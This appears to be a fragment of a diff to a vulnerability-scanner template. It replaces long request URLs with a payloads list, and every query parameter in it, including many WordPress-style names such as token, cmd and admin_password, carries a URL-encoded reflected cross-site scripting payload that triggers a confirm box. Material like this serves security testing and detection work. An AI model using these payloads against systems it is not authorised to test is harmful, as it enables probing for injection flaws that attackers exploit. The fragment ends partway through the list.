"{{BaseURL}}/?next=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-next%27%29%3E&preview=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview%27%29%3E&shortcode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-shortcode%27%29%3E&features=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-features%27%29%3E&mode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mode%27%29%3E&out_trade_no=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-out_trade_no%27%29%3E&category=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category%27%29%3E&replytocom=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-replytocom%27%29%3E&from=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-from%27%29%3E&start=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start%27%29%3E&value=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-value%27%29%3E&range=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-range%27%29%3E&table=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-table%27%29%3E&limit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-limit%27%29%3E" - - "{{BaseURL}}/?callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-callback%27%29%3E&weblog_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-weblog_title%27%29%3E&check=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-check%27%29%3E&overwrite=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-overwrite%27%29%3E&prefix=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-prefix%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-l%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-token%27%29%3E&start_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start_date%27%29%3E&direction=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-direction%27%29%3E&ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ID%27%29%3E&pid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pid%27%29%3E&to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-to%27%29%3E&checkemail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checkemail%27%29%3E&menu-locations=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-locations%27%29%3E" - - 
"{{BaseURL}}/?name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-name%27%29%3E&json=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-json%27%29%3E&id_base=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id_base%27%29%3E&where=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-where%27%29%3E&request=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-request%27%29%3E¬es=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-notes%27%29%3E&img=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-img%27%29%3E&a=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-a%27%29%3E&menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-item%27%29%3E&xml=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-xml%27%29%3E&columns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-columns%27%29%3E&service=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-service%27%29%3E&site_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site_id%27%29%3E" - - "{{BaseURL}}/?tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags%27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e%27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users%27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format%27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl%27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url%27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme%27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname%27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields%27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form%27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level%27%29%3E&month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month%27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier%27%29%3E" - - 
"{{BaseURL}}/?order_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order_id%27%29%3E&cookie=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cookie%27%29%3E&debug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-debug%27%29%3E&m=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-m%27%29%3E&dir=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dir%27%29%3E&new_role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new_role%27%29%3E&trashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trashed%27%29%3E&log=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-log%27%29%3E&excerpt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-excerpt%27%29%3E&settings-updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings-updated%27%29%3E&plugins=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugins%27%29%3E&modify=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-modify%27%29%3E&pwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pwd%27%29%3E&file=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file%27%29%3E" - - "{{BaseURL}}/?i=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-i%27%29%3E&database=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-database%27%29%3E&tax_input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax_input%27%29%3E&secret=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-secret%27%29%3E&mod=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mod%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-s%27%29%3E&stage=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stage%27%29%3E&time=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-time%27%29%3E&new=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-api_key%27%29%3E&invalid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-invalid%27%29%3E&db=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db%27%29%3E&upload=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-upload%27%29%3E&tablename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tablename%27%29%3E" - - 
"{{BaseURL}}/?subject=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-subject%27%29%3E&sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sticky%27%29%3E&ns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ns%27%29%3E&history=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-history%27%29%3E&category_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category_id%27%29%3E&metakeyselect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyselect%27%29%3E©=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-copy%27%29%3E&product_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-product_id%27%29%3E&status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-status%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cat%27%29%3E&list=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-list%27%29%3E&val=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-val%27%29%3E&what=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-what%27%29%3E&group_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group_id%27%29%3E" - - "{{BaseURL}}/?attachment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment%27%29%3E&dbname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dbname%27%29%3E&rows=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rows%27%29%3E&parent_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent_id%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lang%27%29%3E&fid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fid%27%29%3E&text=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text%27%29%3E&link=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link%27%29%3E&timeout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timeout%27%29%3E&db_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_name%27%29%3E&ids=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ids%27%29%3E&w=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-w%27%29%3E&provider=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-provider%27%29%3E&plugin_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin_status%27%29%3E" - - 
"{{BaseURL}}/?sort=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sort%27%29%3E&msg=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-msg%27%29%3E&hostname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hostname%27%29%3E&directory=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-directory%27%29%3E&disabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-disabled%27%29%3E&last_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-last_name%27%29%3E&oauth_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_token%27%29%3E&first_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-first_name%27%29%3E&delete_widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete_widget%27%29%3E&md5=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-md5%27%29%3E&selection=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-selection%27%29%3E&filename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filename%27%29%3E&address=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-address%27%29%3E" - - "{{BaseURL}}/?ajax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ajax%27%29%3E&timezone_string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone_string%27%29%3E&group=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group%27%29%3E&update=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-update%27%29%3E&revision=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-revision%27%29%3E&referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-referer%27%29%3E&index=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-index%27%29%3E&src=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-src%27%29%3E&end_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end_date%27%29%3E&gmt_offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gmt_offset%27%29%3E¶ms=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-params%27%29%3E&html=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-html%27%29%3E&pass=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass%27%29%3E&offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-offset%27%29%3E" - - 
"{{BaseURL}}/?image=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-image%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id%27%29%3E&order=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order%27%29%3E&sid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sid%27%29%3E&language=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-language%27%29%3E&filter=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filter%27%29%3E&import=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-import%27%29%3E&st=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-st%27%29%3E&act=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-act%27%29%3E&object=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-object%27%29%3E&insert=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-insert%27%29%3E&task=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-task%27%29%3E&dismiss=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dismiss%27%29%3E&orderby=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-orderby%27%29%3E" - - "{{BaseURL}}/?up=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-up%27%29%3E&body=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-body%27%29%3E&return=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-return%27%29%3E&end=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end%27%29%3E&n=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-n%27%29%3E&opt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-opt%27%29%3E&source=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-source%27%29%3E&y=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-y%27%29%3E&parent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent%27%29%3E&reason=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reason%27%29%3E&meta=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-meta%27%29%3E&pass1=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass1%27%29%3E&blog=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog%27%29%3E&plugin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin%27%29%3E" - - 
"{{BaseURL}}/?option=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-option%27%29%3E&server=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-server%27%29%3E&admin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin%27%29%3E&create=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-create%27%29%3E&template=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-template%27%29%3E&number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-number%27%29%3E&lastname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lastname%27%29%3E&multi_number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-multi_number%27%29%3E&size=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-size%27%29%3E&tax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax%27%29%3E&sql=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sql%27%29%3E&show_sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show_sticky%27%29%3E&attachments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachments%27%29%3E&_method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_method%27%29%3E" - - "{{BaseURL}}/?taxonomy=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-taxonomy%27%29%3E&tables=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tables%27%29%3E&confirm=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-confirm%27%29%3E&db_port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_port%27%29%3E&op=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-op%27%29%3E&untrashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-untrashed%27%29%3E&tid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tid%27%29%3E&flag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-flag%27%29%3E&stylesheet=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stylesheet%27%29%3E&download=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-download%27%29%3E&comment_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_status%27%29%3E&_wpnonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wpnonce%27%29%3E&metakeyinput=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyinput%27%29%3E&remove=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-remove%27%29%3E" - - 
"{{BaseURL}}/?deleted=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-deleted%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-search%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action%27%29%3E&newname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newname%27%29%3E&info=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-info%27%29%3E&content=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-content%27%29%3E&signature=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signature%27%29%3E&noconfirmation=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noconfirmation%27%29%3E&field=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field%27%29%3E&output=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-output%27%29%3E&city=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-city%27%29%3E&rename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rename%27%29%3E&mail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mail%27%29%3E&term=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-term%27%29%3E" - - "{{BaseURL}}/?tab=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tab%27%29%3E&domain=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-domain%27%29%3E&show=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show%27%29%3E&submit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-submit%27%29%3E&move=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-move%27%29%3E&userid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-userid%27%29%3E&oitar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oitar%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-key%27%29%3E&description=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-description%27%29%3E&user=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user%27%29%3E&active=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-active%27%29%3E&clone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-clone%27%29%3E&success=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-success%27%29%3E&slug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-slug%27%29%3E" - - 
"{{BaseURL}}/?widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget%27%29%3E&height=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-height%27%29%3E&screen=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-screen%27%29%3E&pass2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass2%27%29%3E&redirect_to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect_to%27%29%3E&items=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-items%27%29%3E&string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-string%27%29%3E&hidden=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hidden%27%29%3E&f=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-f%27%29%3E&step=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-step%27%29%3E&role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-role%27%29%3E&preview_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_nonce%27%29%3E&date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-date%27%29%3E&event=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-event%27%29%3E" - - "{{BaseURL}}/?num=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-num%27%29%3E&drop=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-drop%27%29%3E&g-recaptcha-response=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g-recaptcha-response%27%29%3E&field_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field_id%27%29%3E&user_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_email%27%29%3E&alias=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-alias%27%29%3E&ref=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ref%27%29%3E&save=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-save%27%29%3E&enabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enabled%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-year%27%29%3E&checked=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checked%27%29%3E&post_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_ID%27%29%3E&files=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-files%27%29%3E&text-color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text-color%27%29%3E" - - 
"{{BaseURL}}/?admin_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_email%27%29%3E&code=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-code%27%29%3E&dump=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dump%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-item%27%29%3E&timezone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone%27%29%3E&blog_public=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog_public%27%29%3E&add=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-add%27%29%3E&enable=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enable%27%29%3E&customized=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-customized%27%29%3E&admin_password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_password%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keywords%27%29%3E×tamp=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timestamp%27%29%3E&label=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-label%27%29%3E&g=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g%27%29%3E" - - "{{BaseURL}}/?location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-location%27%29%3E&link_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_url%27%29%3E&post_mime_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_mime_type%27%29%3E&uid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uid%27%29%3E&host=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-host%27%29%3E&cmd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cmd%27%29%3E&link_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_id%27%29%3E&reset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reset%27%29%3E&nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nonce%27%29%3E&username=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-username%27%29%3E&site=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site%27%29%3E&do=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-do%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-email%27%29%3E" + - "{{BaseURL}}/?{{xss_param}}" + + payloads: + xss_param: + - 
"u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E" + - "send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E" + - 
"uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname%27%29%3E&command=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-command%27%29%3E&reverse=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reverse%27%29%3E&cancel=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cancel%27%29%3E&h=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-h%27%29%3E&logout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-logout%27%29%3E§ion=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-section%27%29%3E&gid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gid%27%29%3E&input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-input%27%29%3E&post_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_type%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page%27%29%3E&updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-updated%27%29%3E&charset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-charset%27%29%3E&v=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-v%27%29%3E" + - "t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E" + - 
